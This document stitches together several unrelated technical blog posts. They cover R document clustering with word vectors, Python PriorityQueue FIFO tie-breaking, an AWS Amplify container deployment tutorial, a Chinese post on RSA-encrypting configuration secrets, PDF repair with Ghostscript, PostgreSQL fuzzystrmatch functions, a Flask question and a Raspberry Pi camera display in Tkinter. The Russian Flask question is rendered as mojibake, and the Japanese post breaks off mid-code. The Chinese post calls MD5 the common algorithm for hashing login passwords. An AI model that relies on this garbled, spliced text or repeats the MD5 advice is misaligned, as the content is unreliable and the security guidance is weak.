tm = utl$Term_Matrix(sort_terms = FALSE, to_lower = T, remove_punctuation_vector = F,
remove_numbers = F, trim_token = T, split_string = T,
stemmer = "porter2_stemmer",
split_separator = " \r\n\t.,;:()?!//", remove_stopwords = T,
language = "english", min_num_char = 3, max_num_char = 100,
print_every_rows = 100000, normalize = NULL, tf_idf = F,
threads = 6, verbose = T)
gl_term_w = utl$global_term_weights()
str(gl_term_w)
For simplicity, I’ll use the Reuters data as input to the fastTextR::skipgram_cbow function. The data has to be first pre-processed and then saved to a file,
save_dat = textTinyR::tokenize_transform_vec_docs(object = concat, as_token = T,
to_lower = T,
remove_punctuation_vector = F,
remove_numbers = F, trim_token = T,
split_string = T,
split_separator = " \r\n\t.,;:()?!//",
remove_stopwords = T, language = "english",
min_num_char = 3, max_num_char = 100,
stemmer = "porter2_stemmer",
path_2folder = "/path_to_your_folder/",
threads = 1, # whenever I save data to file set the number threads to 1
verbose = T)
UPDATE 11-04-2019: There is an updated version of the fastText R package which includes all the features of the ported fasttext library. Therefore the old fastTextR repository is archived. See also the corresponding blog-post.
Then, I’ll load the previously saved data and I’ll use fastTextR to build the word-vectors,
PATH_INPUT = "/path_to_your_folder/output_token_single_file.txt"
PATH_OUT = "/path_to_your_folder/rt_fst_model"
vecs = fastTextR::skipgram_cbow(input_path = PATH_INPUT, output_path = PATH_OUT,
method = "skipgram", lr = 0.075, lrUpdateRate = 100,
dim = 300, ws = 5, epoch = 5, minCount = 1, neg = 5,
wordNgrams = 2, loss = "ns", bucket = 2e+06,
minn = 0, maxn = 0, thread = 6, t = 1e-04, verbose = 2)
Before using one of the three methods, it would be better to reduce the initial dimensions of the word-vectors (rows of the matrix). So, I’ll keep the word-vectors for which the terms appear in the Reuters data set - clust_vec$token ( although it’s not applicable in this case, if the resulted word-vectors were based on external data - say the Wikipedia data - then their dimensions would be way larger and many of the terms would be redundant for the Reuters data set increasing that way the computation time considerably when invoking one of the doc2vec methods),
init = textTinyR::Doc2Vec$new(token_list = clust_vec$token,
word_vector_FILE = "path_to_your_folder/rt_fst_model.vec",
print_every_rows = 5000,
verbose = TRUE,
copy_data = FALSE) # use of external pointer
pre-processing of input data starts ...
File is successfully opened
total.number.lines.processed.input: 25000
creation of index starts ...
intersection of tokens and wordvec character strings starts ...
modification of indices starts ...
final processing of data starts ...
File is successfully opened
total.number.lines.processed.output: 25000
In case that copy_data = TRUE then the pre-processed data can be observed before invoking one of the ‘doc2vec’ methods,
# res_wv = init$pre_processed_wv()
#
# str(res_wv)
Then, I can use one of the three methods (sum_sqrt, min_max_norm, idf) to receive the transformed vectors. These methods are based on the following blog-posts (see especially www.linkedin.com/pulse/duplicate-quora-question-abhishek-thakur and www.erogol.com/duplicate-question-detection-deep-learning ),
doc2_sum = init$doc2vec_methods(method = "sum_sqrt", threads = 6)
doc2_norm = init$doc2vec_methods(method = "min_max_norm", threads = 6)
doc2_idf = init$doc2vec_methods(method = "idf", global_term_weights = gl_term_w, threads = 6)
rows_cols = 1:5
doc2_sum[rows_cols, rows_cols]
doc2_norm[rows_cols, rows_cols]
doc2_idf[rows_cols, rows_cols]
> dim(doc2_sum)
[1] 10788 300
> dim(doc2_norm)
[1] 10788 300
> dim(doc2_idf)
[1] 10788 300
For illustration, I’ll use the resulted word-vectors of the sum_sqrt method. The approach described can be used as an alternative to Latent semantic indexing (LSI) or topic-modeling in order to discover categories in text data (documents).
First, someone can seach for the optimal number of clusters using the Optimal_Clusters_KMeans function of the ClusterR package,
scal_dat = ClusterR::center_scale(doc2_sum) # center and scale the data
opt_cl = ClusterR::Optimal_Clusters_KMeans(scal_dat, max_clusters = 15,
criterion = "distortion_fK",
fK_threshold = 0.85, num_init = 3,
max_iters = 50,
initializer = "kmeans++", tol = 1e-04,
plot_clusters = TRUE,
verbose = T, tol_optimal_init = 0.3,
seed = 1)
Based on the output of the Optimal_Clusters_KMeans function, I’ll pick 5 as the optimal number of clusters in order to perform k-means clustering,
num_clust = 5
km = ClusterR::KMeans_rcpp(scal_dat, clusters = num_clust, num_init = 3, max_iters = 50,
initializer = "kmeans++", fuzzy = T, verbose = F,
CENTROIDS = NULL, tol = 1e-04, tol_optimal_init = 0.3, seed = 2)
table(km$clusters)
1 2 3 4 5
713 2439 2393 2607 2636
As a follow up, someone can also perform cluster-medoids clustering using the pearson-correlation metric, which resembles the cosine distance ( the latter is frequently used for text clustering ),
kmed = ClusterR::Cluster_Medoids(scal_dat, clusters = num_clust,
distance_metric = "pearson_correlation",
minkowski_p = 1, threads = 6, swap_phase = TRUE,
fuzzy = FALSE, verbose = F, seed = 1)
table(kmed$clusters)
1 2 3 4 5
2396 2293 2680 875 2544
Finally, the word-frequencies of the documents can be obtained using the cluster_frequency function, which groups the tokens (words) of the documents based on which cluster each document appears,
freq_clust = textTinyR::cluster_frequency(tokenized_list_text = clust_vec$token,
cluster_vector = km$clusters, verbose = T)
Time difference of 0.1762383 secs
> freq_clust
$`3`
WORDS COUNTS
1: mln 8701
2: 000 6741
3: cts 6260
4: net 5949
5: loss 4628
---
6417: vira> 1
6418: gain> 1
6419: pwj> 1
6420: drummond 1
6421: parisian 1
$`1`
WORDS COUNTS
1: cts 1303
2: record 696
3: april 669
4: < 652
5: dividend 554
---
1833: hvt> 1
1834: bang> 1
1835: replac 1
1836: stbk> 1
1837: bic> 1
$`4`
WORDS COUNTS
1: mln 6137
2: pct 5084
3: dlrs 4024
4: year 3397
5: billion 3390
---
10968: heijn 1
10969: "behind 1
10970: myo> 1
10971: "favor 1
10972: wonder> 1
$`5`
WORDS COUNTS
1: < 4244
2: share 3748
3: dlrs 3274
4: compani 3184
5: mln 2659
---
13059: often-fat 1
13060: computerknowledg 1
13061: fibrinolyt 1
13062: hercul 1
13063: ceroni 1
$`2`
WORDS COUNTS
1: trade 3077
2: bank 2578
3: market 2535
4: pct 2416
5: rate 2308
---
13702: "mfn 1
13703: uk> 1
13704: honolulu 1
13705: arap 1
13706: infinitesim 1
freq_clust_kmed = textTinyR::cluster_frequency(tokenized_list_text = clust_vec$token,
cluster_vector = kmed$clusters, verbose = T)
Time difference of 0.1685851 secs
This is one of the ways that the transformed word-vectors can be used and is solely based on tokens (words) and word frequencies. However a more advanced approach would be to cluster documents based on word n-grams and take advantage of graphs as explained here in order to plot the nodes, edges and text.
References:
|
A queue retrives items in FIFO (first in, first out) order. A priority queue retrieves item based on priority, higher priority items come first. Well, what happens if you submit items that have equal priorities? It depends on how the priority queue was implemented. Read on for how this is handled in the Python standard library’s queue.PriorityQueue.
Let’s see queue.PriorityQueue in action in a simple case:
>>> from queue import PriorityQueue >>> q = PriorityQueue() >>> q.put((1, 'A')) >>> q.put((2, 'B')) >>> q.put((3, 'C')) >>> q.get() (1, 'A') >>> q.get() (2, 'B') >>> q.get() (3, 'C') >>> q.empty() True
As we can see, we’ve put (priority_number, data) into the queue, and retrieved them using the get() method. We see that lower numbers correspond to higher priorities.
Let’s now add some jobs with equal priorities and retrieve them:
>>> q.put((1, 'My first job')) >>> q.put((1, 'Another job')) >>> q.get() (1, 'Another job') >>> q.get() (1, 'My first job')
We did not retrieve items in FIFO order for jobs of equal priority: 'Another job' was fetched prior to 'My first job' even though it was added afterwards. Why does this happen?
Using a min-heap for queue.PriorityQueue
The short version is that we grabbed 'Another job' first, because 'Another job' < 'My first job' alphabetically.
The longer version is that under the hood, queue.PriorityQueue is implemented using heapq, Python’s heap implementation. Every job is an element in a min-heap. A min-heap is a complete binary tree that satisfies the min-heap propety: the value of each node is greater than or equal to the value of its parent. The root element will be the node with the minimum value. So to get the next job we want to run, we just grab the element at the top of the min-heap, which due to the min-heap property, we know will be the job with the minimum priority value - which remember from above corresponds to the higher priority.
But where is this comparison done: 'Another job' < 'My first job'? During heap operations, elements are compared with one another (and swapped if needed). In Python, this is done using the rich comparison operator __lt__. 'Another job' will bubble to the top of the heap since 'Another job' < 'My first job'.
How we can solve this
Here’s an approach I used for Python 3.5 (the version of Python I was writing for when I looked into using this functionality). For the application I was working on, I needed to retrieve items based on priority, and for items of equal priority, I needed to retrieve items in FIFO order.
One simple approach if you hit this problem is following a suggestion in the heapq documentation: “store entries as 3-element list including the priority, an entry count, and the task”, where the entry count is a tie-breaker for jobs of equal priority. Let’s see that demonstrated:
>>> q.put((1, 1, 'My next job')) >>> q.put((1, 2, 'Another job')) >>> q.get() (1, 1, 'My next job') >>> q.get() (1, 2, 'Another job')
In my situation, I was working in a codebase that had already a mediator interface to submit jobs (to queue.PriorityQueue), and job objects themselves were separate objects (i.e. not simple strings in the real applicatoin). I ended up making jobs sortable using the following superclass that implemented the __lt__ rich comparison method:
from typing import TypeVar QueueJobType = TypeVar('QueueJobType', bound='QueueJob') class QueueJob(): def __init__(self, order_number: int, task: str) -> None: self.order_number = order_number self.task = task def __lt__(self, other: QueueJobType) -> bool: ''' We need to use the order_number key to break ties to ensure that objects are retrieved in FIFO order. ''' return self.order_number < other.order_number def __repr__(self) -> str: return self.task
When I submitted jobs, I’d do so using an interface like this (application simplified for demonstration purposes, more context is here) that would set the order_number such that it would be monotonically increasing:
import itertools import queue class App(): def __init__(self): self.order_number = itertools.count() self.queue = queue.PriorityQueue() def add_task(self, priority: int, task: str): current_order_number = next(self.order_number) task = QueueJob(current_order_number, task) self.queue.put((priority, task))
Let’s see if jobs with equal priorities are retrieved in FIFO order:
>>> from stuff import App >>> app = App() >>> app.add_task(1, 'My first job') >>> app.add_task(1, 'Another job') >>> app.queue.get() (1, My first job) >>> app.queue.get() (1, Another job)
Jobs with equal priorities are retrieved in FIFO order, which is what we wanted.
|
Zero-effort Container deployment for GraphQL and REST APIs and Web Hosting with Amplify CLI
AWS Amplify is the fastest and easiest way to build cloud-powered mobile and web apps on AWS. Amplify comprises a set of tools and services that enables front-end web and mobile developers to leverage the power of AWS services to build innovative and feature-rich applications.
With today’s Amplify CLI release, we’re enabling front-end web and mobile customers to deploy their API (GraphQL & REST) or host their web apps using containers. You can bring your own Dockerfile or Docker Compose and Amplify CLI will automatically build, package and deploy your containers using AWS Fargate.
Benefits:
Portability of your app backend– Amplify CLI provides you simple container templates to get started with or you can bring your own containers if your team already uses containers for API & Hosting,
Out-of-the-box infrastructure setup for your container deployment pipeline– Amplify CLI manages infrastructure such as VPC, subnets, NACLs, IAM policies, and other security and infrastructure practices with zero prior knowledge of AWS required. Networking between containers automatically handled for you, as well as SSL generation for hosted sites.
Zero-effort build & deployment pipeline creation– Amplify CLI creates a CodePipeline to build and deploy your images. The pipeline has cost optimization best practices such as lifecycle policies on build artifacts and images. Docker doesn’t even need to be installed on your system to build and deploy to AWS.
What we’ll build:
First, an ExpressJS server that returns a random number
Second, an ExpressJS that runs a FizzBuzz algorithm on a Python/Flash random number generator server.
Prerequisites:
Install the latest Amplify CLI version
Open terminal and run npm install -g @aws-amplify/clito update to the latest Amplify CLI.
Open terminal and run
Amplify CLI is already configured
If you haven’t configured the Amplify CLI yet, follow this guide on our documentation page.
Setup a new Amplify project
Run the following command to create a new Amplify project called “amplify-containerized” or if you already have an existing Amplify project skip to the next section.
mkdir amplify-containerized
cd amplify-containerized
Initialize an Amplify project by running:
amplify init
For the purposes of this blog post, you can just accept all the default values in the amplify init workflow.
Enable container based deployments
Container-based deployments needs to be explicitly toggled on. Run amplify configure project to review your project configuration:
amplify configure project
accept the defaults and answer “yes” when asked if you want to enable container-based deployments:
...
? Do you want to enable container-based deployments? Yes
Add a new container-based ExpressJS API
Amplify CLI will maintain the same DX as for any existing API workflows. Once container-based deployments are enabled, you gain the ability to select “REST” → “API Gateway + AWS Fargate (Container-based)” during the amplify add api workflow.
Amplify CLI supports both GraphQL and REST API options for container based deployments. You can use container-based deployments alongside existing AppSync and API Gateway + Lambda options. For our demo, let’s create a REST API.
To create our first container-based REST API, run the following command:
amplify add api
Choose the following options:
? Please select from one of the below mentioned services:
> REST
? Which service would you like to use
> API Gateway + AWS Fargate (Container-based)
? Provide a friendly name for your resource to be used as a label for this category in the project:
> containerb5734e35
? What image would you like to use
> ExpressJS - REST template
? When do you want to build & deploy the Fargate task
> On every "amplify push" (Fully managed container source)
? Do you want to restrict API access
> No
After a successful completion of the CLI workflow, you’ll see these new files added to your project folder structure.
amplify/backend/api/<your-api-name>
├── amplify.state
├── containerb5734e35-cloudformation-template.json
├── parameters.json
└── src
├── Dockerfile
├── DynamoDBActions.js
├── buildspec.yml
├── index.js
├── package-lock.json
└── package.json
In the src/index.js you’ll find a starter ExpressJS source code that’ll allow you to interact with DynamoDB. Let’s edit that to return a random number.
Replace the index.js file with the following code:
const express = require("express");
const bodyParser = require('body-parser');
const port = process.env.PORT || 3001;
const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
// Enable CORS for all methods
app.use(function (req, res, next) {
res.header("Access-Control-Allow-Origin", "*")
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept")
next()
});
app.get("/", async (req, res, next) => {
try {
res.contentType("application/json").send({
"randomNumber": Math.floor(Math.random() * 101)
})
} catch (err) {
next(err);
}
});
app.listen(port, () => {
console.log('Example app listening at http://localhost:' + port);
});
Now let’s deploy your API:
amplify push
Here’s what’s happening under the hood:
Amplify creates APIs as an ECS Service to ensure that your application is monitored and tasks are in a healthy and active state, automatically recovering if an instance fails. When you make changes to your source code, the build and deployment pipeline will take your source code and Dockerfile/Docker Compose configuration as inputs. One or more containers will be built in AWS CodeBuild using your source code and pushed to ECR with a build hash as a tag, allowing you to roll back deployments if something unexpected happens in your application code. After the build is complete, the pipeline will perform a rolling deployment to launch AWS Fargate Tasks automatically. Only when all new versions of the image are in a healthy & running state will the old tasks be stopped. Finally the build artifacts in S3 (in the fully managed scenario) and ECR images are set with a lifecycle policy retention of 7 days for cost optimization.
Test your new containerized ExpressJS API
The best way to demonstrate the containerized API is just by calling it with cURL. The API endpoint is printed at the end of the “amplify push” command or when you run “amplify status”.
curl https://<YOUR_API_ID>.us-east-1.amazonaws.com/
Deployments for Containers can take a bit longer to build and deploy, but after a few minutes, you can verify the availability by checking the CodePipeline URL printed at the beginning of your “amplify push” command or run “amplify console api”, select the API, and select “CodePipeline”
Note: This is a simple use case just to showcase the workflow. Our ExpressJS template also provides out-of-the-box support to create a CRUD interface for a DynamoDB table. Review our documentation if you’re interested in that scenario.
Multi-container deployments
Amplify CLI fully relies on a Docker Compose configuration to enable multi-container deployments. Amplify automatically infers the Fargate and ECS settings based on your app’s Dockerfile or Docker Compose. Amplify also allows you to have inter-container networking based on the configured ports in your Docker Compose configuration.
To demonstrate that, let’s run amplify add api and select “REST” → “API Gateway + AWS Fargate (Container-based)” → “Docker Compose - ExpressJS + Flask template” value to add a new multi-container API. This will create a following folder structure in your amplify/backend/api/<your-api-name>/ folder.
amplify/backend/api/<your-api-name>/
├── amplify.state
├── <your-api-name>-cloudformation-template.json
├── parameters.json
└── src
├── buildspec.yml
├── docker-compose.yml
├── express
│ ├── Dockerfile
│ ├── DynamoDBActions.js
│ ├── index.js
│ └── package.json
└── python
├── Dockerfile
├── requirements.txt
└── src
└── server.py
The top level docker-compose.yml references the express server and the python server. Docker Compose provides a mechanism to deploy multiple containers at once. For more information on Docker Compose, please review the official Docker Compose guide.
This time we’ll have the Python server return a random number and the ExpressJS runs a FizzBuzz algorithm based on the Python server’s random number. Let’s replace our server.py file with the following content:
from flask import Flask
from random import randrange
server = Flask(__name__)
@server.route('/random')
def hello():
return str(randrange(100))
if __name__ == "__main__":
server.run(host='0.0.0.0')
We created a Flask server that has a /random route which returns a random number between 0 and 100.
Now let’s edit the express server to interface with the Python server and then run the FizzBuzz algorithm. Start by replacing the content of the index.js file:
const express = require("express");
const bodyParser = require('body-parser');
const http = require('http');
const port = process.env.PORT || 3000;
const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
// Enable CORS for all methods
app.use(function(req, res, next) {
res.header("Access-Control-Allow-Origin", "*")
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept")
next()
});
app.get("/fizzbuzz", (req, res, next) => {
// add networking code to Python server code here
});
app.listen(port, () => {
console.log('Example app listening at http://localhost:' + port);
});
Then add the networking logic to interface with the Python server. When deployed to the cloud, you can interface with the other services by specifying the host as “localhost” and the “port” as configured in the docker-compose.yml. If you’re testing locally with the Docker CLI, reference the Python server by it’s Docker Compose container name.
Multiple containers are deployed as a single unit in Fargate (e.g. same Task Definition). This opinionated deployment allows ease of networking between containers on the local loopback interface and avoids extra configuration, costs, operations, and debugging.
Add the following code right below the comment: “// add networking code to Python server code here”
const options = {
port: 5000,
host: 'localhost', // replace with 'python' for local development
method: 'GET',
path: '/random'
};
http.get(options, data => {
var body = '';
data.on('data', (chunk) => {
body += chunk;
});
data.on('end', () =>{
console.log(body);
const randomNumber = body
let fizzOrBuzz = ''
// Add FizzBuzz logic code here
try {
res.contentType("application/json").send({
"newRandomNumber": body,
"fizzOrBuzz": fizzOrBuzz
});
} catch (err){
console.log(err);
next(err);
}
}).on('error', (error) => {
console.log(error);
});
})
Last but not least, add the FizzBuzz algorithm and return the result to the API caller. Add this FizzBuzz algorithm below “//Add FizzBuzz logic here”
if (randomNumber % 15 === 0) {
fizzOrBuzz = 'FizzBuzz'
}
else if (randomNumber % 3 === 0) {
fizzOrBuzz = 'Fizz'
}
else if (randomNumber % 5 === 0) {
fizzOrBuzz = 'Buzz'
}
else {
fizzOrBuzz = randomNumber
}
We’ve got our business logic completed! Let’s deploy our multi-container API by running the following command:
amplify push
Once successfully deployed, you can try to “cURL” the API. You should now be able to see the random number and FizzBuzz result returned:
❯ curl https://<YOUR_API_ID>.execute-api.us-east-1.amazonaws.com/fizzbuzz
{"newRandomNumber":"37","fizzOrBuzz":"37"}
❯ curl https://<YOUR_API_ID>.execute-api.us-east-1.amazonaws.com/fizzbuzz
{"newRandomNumber":"72","fizzOrBuzz":"Fizz"}
Success!
This blog post demonstrated a quick way to deploy single and multiple containers using Amplify CLI. There is so much more to serverless containers that we couldn’t cover in this blog post. This includes:
GitHub trigger-based deployments
Automatically secure an API with Amazon Cognito
Hosting workflows for your web apps
Multi-environment support
Look out for future blog posts on containers and review our documentation for more details.
|
曾有个同事不小心把项目代码给传到了Github上,导致代码里边的一个明文邮箱账号密码被利用,为此公司及个人都付出了沉重的代价。那么代码中的敏感信息该如何处理呢?本文将简单介绍一下我们的实践方法。
信息加密常见的有两类:
第一类无需解密:例如系统登录密码加密,通过加密算法对用户输入密码进行加密后存放在数据库中,用户再次登录时依然拿相同的加密算法对用户输入密码进行加密,拿加密后的结果和数据库中存放的结果做对比,整个过程中都不需要知道用户输入的原始密码是什么,MD5是处理此类加密最常用的加密算法
第二类需要解密:例如我们写在项目代码中连接数据库的账号密码,项目代码中以密文方式存储,当需要连接数据库的时候,要对密文进行解密,拿到原始未加密的账号密码去连接数据库,与MD5单向加密不同,这类加密需要能对加密后的密文进行解密,此类加密方法目前最常用的加密算法为RSA
我们这里考虑的是给配置文件里的敏感信息加密,也就是上边说的第二类情况,采用的也是RSA加密算法,关于RSA加密算法的详细内容自行Google下吧,这里不赘述,需要知道以下两点就可以了:
这里注意一个问题,拿到私钥就可以对加密字符串进行解密,那么这个秘钥肯定就不能放在项目代码中了,不然再遇到代码给传Github的情况就可以拿秘钥进行解密,失去了加密的意义了。这里我们的策略是秘钥统一由运维管理,直接放在生产服务器中,项目代理里配置路径可读取秘钥即可,避免秘钥因代码泄露而泄露。
RSA加解密python脚本,可以直接使用此脚本生成RSA秘钥对,加密密码或者解密,当然也可以使用OpenSSL工具完成此操作
import binascii
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_v1_5
class RsaCrypto():
'''RSA 加解密'''
def create_rsa_key(self):
'''生成RSA秘钥对'''
try:
key = RSA.generate(2048)
encrypted_key = key.exportKey(pkcs=8)
public_key = key.publickey().exportKey().decode('utf-8')
private_key = encrypted_key.decode('utf-8')
return {'state': 1, 'message': {'public_key': public_key, 'private_key': private_key}}
except Exception as err:
return {'state': 0, 'message': str(err)}
def encrypt(self, public_key, plaintext):
'''加密方法'''
try:
recipient_key = RSA.import_key(public_key)
cipher_rsa = PKCS1_v1_5.new(recipient_key)
en_data = cipher_rsa.encrypt(plaintext.encode('utf-8'))
hex_data = binascii.hexlify(en_data).decode('utf-8')
return {'state': 1, 'message': hex_data}
except Exception as err:
return {'state': 0, 'message': str(err)}
def decrypt(self, private_key, hex_data):
'''解密方法'''
try:
private_key = RSA.import_key(private_key)
cipher_rsa = PKCS1_v1_5.new(private_key)
en_data = binascii.unhexlify(hex_data.encode('utf-8'))
data = cipher_rsa.decrypt(en_data, None).decode('utf-8')
return {'state': 1, 'message': data}
except Exception as err:
return {'state': 0, 'message': str(err)}
if __name__ == '__main__':
print(RsaCrypto().create_rsa_key())
以数据库的密码管理为样例来介绍下我们的流程
秘钥跟代码分离,这样在整个过程中,开发、运维都无法接触到数据库密码,每个角色得到的信息都够用且最少,减少中间出错或泄露的可能
以上流程中,生成秘钥对和通过秘钥对密码进行加密我们已经在web端实现了这个功能,可以方便运维及DBA进行操作,界面如下:
以上界面为运维操作界面,可以生成秘钥、查看秘钥、下载秘钥
以上界面为DBA操作界面,可以选择秘钥并对密码进行加密生成加密后密文
两个界面按权限划分,运维只能看到第一个界面,DBA只能看到第二个
|
Repair PDF files with python or Compress PDF files with python is very simple. Well that was what I was thinking. Python is very powerful so repairing or compressing a simple PDF file should be easy right? Well……
So I was doing my book keeping for my little own company TS Intermedia and I had to upload (or mail) all these invoices to the Receipt scanner service. I created (of course) a mail python script for this. But at a certain point PDF files where not imported. I contacted the helpdesk and they told me that the PDF file was “corrupt.” Well not really corrupt, but there where some strange characters at the beginning of the file. I guess the system that created the PDF files had a bug so it started with some HTML code.
As I do not like doing work twice…. and in this case manually typing in the numbers, dates and other invoice data of 20+ invoices I wanted to repair the PDF’s so I could upload them.
Mac Viewer
So the fantastic :-) OS X software has a feature called Viewer. Within viewer you can save the PDF you are looking at and guess what…. it fixed the PDF file!
I could upload it to the system and it was converted into usable data.
Now…. again… I’m not the guy that does work twice (manually) so opening, saving and closing 20+ PDF files…. no I guess not. So as the Mac Viewer app is very good to use for one file, it was no option.
Github
So I searched fo a Python package to help me repair my PDF files. Now there are a lot of fixes to be found on the internet. But, they don’t work. Or they don’t work in Python 3.x or you need a contract with a third party as some fixes are your api calls to services that will fix you PDF.
Now there is one catch! It not a python solution at all! It actually uses GhostScript on the background to solve this problem.
GhostScript
Ghostscript is an interpreter for PostScript™ and Portable Document Format (PDF) files. Ghostscript consists of a PostScript interpreter layer, and a graphics library. Sometimes the Ghostscript graphics library is confusingly also referred to simply as Ghostscript. Even more confusingly, sometimes people say Ghostscript when they really mean GhostPDL.
So if you want to use the PDF compressor you need to install GhostScript.
Got a Mac? Then its easy.
brew install ghostscript
Have windows… well… good luck with the installation!
Class version
So as the theeko74, Pdfc – PDF Compressor works very well, it does not work on folders with multiple files. So I forked the code in Github and created an other version of it.
I created a Class for the function that you can call to compress and repair. Using a class is more easy for you to use as you can just call it, to use it or extent it to build an even better version for you needs.
So to compress and or repair PDF files you can use the files on my Github account.
For using my code just add import CompressPDF to your code.
And then it’s as ease as…..
start_folder = "/your-folder"
compress = 2
p = CompressPDF(compress)
compress_folder = os.path.join(start_folder, "compressed_folder/")
if not os.path.exists(compress_folder):
os.makedirs(compress_folder)
'''Loop within folder over PDF files'''
for filename in os.listdir(start_folder):
my_name, file_extension = os.path.splitext(filename)
if file_extension == '.pdf':
file = os.path.join(start_folder, filename)
new_file = os.path.join(compress_folder, filename)
if p.compress(file, new_file):
print("{} done!".format(filename))
else:
print("{} gave an error!".format(file))
|
ApsaraDB RDS for PostgreSQL provides the fuzzystrmatch plug-in. This plug-in supports the Soundex, Levenshtein, Metaphone, and Double Metaphone algorithms. You can use these algorithms to calculate the similarity and distance between strings.
Soundex
The Soundex algorithm converts similar-sounding words into the same code. However, this algorithm is unsuitable for non-English words.
The Soundex algorithm provides the following functions:
soundex(text) returns text
difference(text, text) returns int
The soundex function converts a string into its Soundex code, such as A550.
The difference function converts two strings into their Soundex codes. Then, the difference function reports the number of code matching positions between the two strings. A Soundex code consists of four characters. Therefore, the number of code matching positions ranges from 0 to 4. The value 0 indicates a zero match, and the value 4 indicates an exact match.
Examples:
SELECT soundex('hello world!') ;
SELECT soundex('Anne'), soundex('Andrew'), difference('Anne', 'Andrew');
SELECT soundex('Anne'), soundex('Margaret'), difference('Anne', 'Margaret');
CREATE TABLE s (nm text);
INSERT INTO s VALUES ('john');
INSERT INTO s VALUES ('joan');
INSERT INTO s VALUES ('wobbly');
INSERT INTO s VALUES ('jack');
SELECT * FROM s WHERE soundex(nm) = soundex('john');
SELECT * FROM s WHERE difference(s.nm, 'john') > 2;
Levenshtein
The Levenshtein algorithm calculates the Levenshtein distance between two strings.
The Levenshtein algorithm provides the following functions:
levenshtein(text source, text target, int ins_cost, int del_cost, int sub_cost) returns int
levenshtein(text source, text target) returns int
levenshtein_less_equal(text source, text target, int ins_cost, int del_cost, int sub_cost, int max_d) returns int
levenshtein_less_equal(text source, text target, int max_d) returns int
The following table describes the parameters that you must configure in the preceding functions.
Parameter Description
source The first string to compare. The string cannot be empty and can contain up to 255 characters in length.
target The second string to compare. The string cannot be empty and can contain up to 255 characters in length.
ins_cost The overhead that is required to insert characters.
del_cost The overhead that is required to delete characters.
sub_cost The overhead that is required to replace characters.
max_d The maximum Levenshtein distance that is allowed between the two specified strings.
NoteThe levenshtein_less_equal function is an accelerated version of the levenshtein function. It is used only to calculate a short Levenshtein distance:
If the actual distance is less than or equal to the value of the max_d parameter, the levenshtein_less_equal function returns the exact distance that is calculated.
If the actual distance is greater than the value of the max_d parameter, the levenshtein_less_equal function returns a random distance that is greater than the value of the max_d parameter.
If the value of the max_d parameter is negative, the levenshtein_less_equal and levenshtein functions return the same distance.
Examples:
SELECT levenshtein('GUMBO', 'GAMBOL');
SELECT levenshtein('GUMBO', 'GAMBOL', 2,1,1);
SELECT levenshtein_less_equal('extensive', 'exhaustive',2);
SELECT levenshtein_less_equal('extensive', 'exhaustive',4);
Metaphone
The Metaphone algorithm works in the same way as the Soundex algorithm. The Metaphone algorithm constructs a representative code for each specified string. If two strings have the same representative code, the Metaphone algorithm considers them to be similar.
The Metaphone algorithm provides the following functions:
metaphone(text source, int max_output_length) returns text
The following table describes the parameters that you must configure in the preceding functions.
Parameter Description
source A string that is not empty. The string can contain up to 255 characters in length.
max_output_length The maximum length of the Metaphone code that can be returned. If the Metaphone code exceeds the maximum length, the Metaphone algorithm truncates the Metaphone code to the maximum length.
Example:
SELECT metaphone('GUMBO', 4);
Double Metaphone
The Double Metaphone algorithm obtains two similar-sounding codes for a specified string. These codes include a primary code and a secondary code. In most cases, the two codes are the same. They may be slightly different when you specify a non-English word. The difference varies based on the pronunciation.
The Double Metaphone algorithm provides the following functions:
dmetaphone(text source) returns text
dmetaphone_alt(text source) returns text
Examples:
select dmetaphone('gumbo');
select dmetaphone_alt('gumbo');
|
ÐоÑоÑе Ð²Ð¾Ñ ÐºÐ¾Ð´ python
#import
from flask import Flask, render_template
from flask import request
from werkzeug.exceptions import BadRequestKeyError
#init
app = Flask(__name__)
#create pages
@app.route('/')
def SayHello():
return 'Why it is not working :('
@app.route('/class_founder', methods=['GET'])
def check():
key = request.form['text']
swap = True
#run app
app.run(debug=True)
Ð Ð²Ð¾Ñ html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Having time</title>
<link rel="stylesheet" href="static/style.css">
</head>
<body>
<section>
<form method="GET" action="/class_founder">
<input name='text' type="text">
<input type="submit" class="button" value="Start">
</form>
<div class="box">
<div class="bar" name='teacher_box'></div>
<div class="bar" name='subject_box'></div>
<div class="bar" name='student_box'></div>
</div>
</section>
</body>
</html>
СоÑ
ÑанÑÑ, обновлÑÑ Ð² конÑоле, оÑкÑÑÐ²Ð°Ñ Ð² бÑаÑзеÑе
Ð Ñам оÑибка BadRequestKeyError мол бÑаÑÐµÑ Ð¾ÑпÑавил request коÑоÑÑй ÑеÑÐ²ÐµÑ Ð½Ðµ можеÑ
понÑÑÑ. Я вÑе пÑавилÑно напиÑал 100% input name
и request.form одинаковÑ. ÐÐ½ÐµÑ Ñже обÑаÑил
ÐÐÐÐÐÐТРÐÐ!!
|
【ラズベリーパイ】カメラモジュールの映像をTkinterに表示する方法
作成日時: 2019年11月4日
更新日時: 2020年7月30日
この記事ではラズベリーパイのカメラモジュールが撮影した動画をTkinterを使ってGUI画面にリアルタイム表示する方法を紹介します。
下の動画のようにラグもかなり少なく実現することができました。
まずはコード全文を載せます。
after関数を使うことで一定時間後に関数を実行させることができます。
なぜなら上のコードはウェブカメラ用のコードだからです。
ウェブカメラの場合は上記コードでうまく動きますが、カメラモジュールの場合失敗します。
僕自身かなりの時間調べてやっと解決策を見つけました。
PiCamera streaming on Tkinter label -Help
下の動画のようにラグもかなり少なく実現することができました。
import tkinter
import cv2
import PIL.Image, PIL.ImageTk
class App:
def __init__(self, window, window_title):
self.window = window
self.window.title(window_title)
self.vcap = cv2.VideoCapture(0)
self.width = self.vcap.get(cv2.CAP_PROP_FRAME_WIDTH)
self.height = self.vcap.get(cv2.CAP_PROP_FRAME_HEIGHT)
# カメラモジュールの映像を表示するキャンバスを用意する
self.canvas = tkinter.Canvas(window, width=self.width, height=self.height)
self.canvas.pack()
# Closeボタン
self.close_btn = tkinter.Button(window, text="Close")
self.close_btn.pack()
self.close_btn.configure(command=self.destructor)
# update()関数を15ミリ秒ごとに呼び出し、
# キャンバスの映像を更新する
self.delay = 15
self.update()
self.window.mainloop()
# キャンバスに表示されているカメラモジュールの映像を
